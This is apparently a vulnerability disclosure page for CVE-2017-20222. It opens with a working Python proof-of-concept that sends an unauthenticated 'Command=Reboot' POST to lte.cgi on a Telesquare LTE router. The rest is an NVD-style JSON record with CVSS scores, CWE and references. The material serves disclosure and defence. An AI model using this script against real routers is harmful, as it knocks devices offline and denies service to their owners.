CVE-2017-20222

import requests # CVE-2017-20222 PoC - Unauthenticated Remote Reboot # Target: Telesquare SKT LTE Router SDT-CS3B1 # Vulnerability: Missing authentication on lte.cgi endpoint def trigger_reboot(target_ip): """ Trigger remote reboot on Telesquare SKT LTE Router SDT-CS3B1 without any authentication required. Args: target_ip: IP address of the vulnerable router Returns: Response from the server """ url = f"http://{target_ip}/lte.cgi" # Construct POST request with Command=Reboot parameter data = { "Command": "Reboot" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } try: print(f"[*] Sending reboot command to {target_ip}...") response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response: {response.text}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None # Usage example if __name__ == "__main__": target = "192.168.1.1" # Replace with actual router IP trigger_reboot(target)

{"cve": {"id": "CVE-2017-20222", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:52.137", "lastModified": "2026-04-14T17:00:24.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Telesquare SKT LTE Router SDT-CS3B1 software version 1.2.0 contains an unauthenticated remote reboot vulnerability that allows attackers to trigger device reboot without authentication. Attackers can send POST requests to the lte.cgi endpoint with the Command=Reboot parameter to cause denial of service by forcing the router to restart."}, {"lang": "es", "value": "Telesquare SKT LTE Router SDT-CS3B1 versión de software 1.2.0 contiene una vulnerabilidad de reinicio remoto no autenticado que permite a los atacantes activar el reinicio del dispositivo sin autenticación. Los atacantes pueden enviar solicitudes POST al endpoint lte.cgi con el parámetro Command=Reboot para causar denegación de servicio al forzar el reinicio del router."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1CB1EF95-F220-467F-903C-0727F5250CF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "81DED0D5-BDBB-4310-BD2D-0F4ED27B274B"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2017120300", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/136825", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/145555", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/43401/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/telesquare-skt-lte-router-sdt-cs3b1-unauthenticated-remote-reboot", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}